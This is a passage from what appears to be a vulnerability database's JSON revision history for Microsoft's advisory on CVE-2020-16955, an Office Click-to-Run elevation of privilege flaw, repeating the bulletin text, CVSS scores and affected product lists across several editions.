["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-11T08:47:48", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-11T08:47:48", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T19:04:26", "differentElements": ["msAffectedSoftware"], "edition": 34}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "11729814de529eab7b78202bfda89574", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-11T20:47:01", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-11T08:47:48", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-11T08:47:48", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T20:47:01", "differentElements": ["msAffectedSoftware"], "edition": 35}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "3ef380d1ad5cccc89011d4f3166318f2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-11T22:53:36", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-11T22:53:36", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-11T22:53:36", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T22:53:36", "differentElements": ["msAffectedSoftware"], "edition": 36}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "380c01a7f417ccb3418ade4faba49154", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-12T04:44:19", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-11T22:53:36", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-11T22:53:36", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-12T04:44:19", "differentElements": ["msAffectedSoftware"], "edition": 37}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "3ef380d1ad5cccc89011d4f3166318f2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-12T06:50:46", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-12T06:50:46", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-12T06:50:46", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-12T06:50:46", "differentElements": ["msAffectedSoftware"], "edition": 38}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "11729814de529eab7b78202bfda89574", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-12T20:49:32", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-12T06:50:46", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-12T06:50:46", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-12T20:49:32", "differentElements": ["msAffectedSoftware"], "edition": 39}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "3ef380d1ad5cccc89011d4f3166318f2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-12T22:47:04", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-12T06:50:46", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-12T06:50:46", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-12T22:47:04", "differentElements": ["msAffectedSoftware"], "edition": 40}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "11729814de529eab7b78202bfda89574", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-13T00:46:17", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-12T06:50:46", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-12T06:50:46", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-13T00:46:17", "differentElements": ["msAffectedSoftware"], "edition": 41}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "3ef380d1ad5cccc89011d4f3166318f2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": 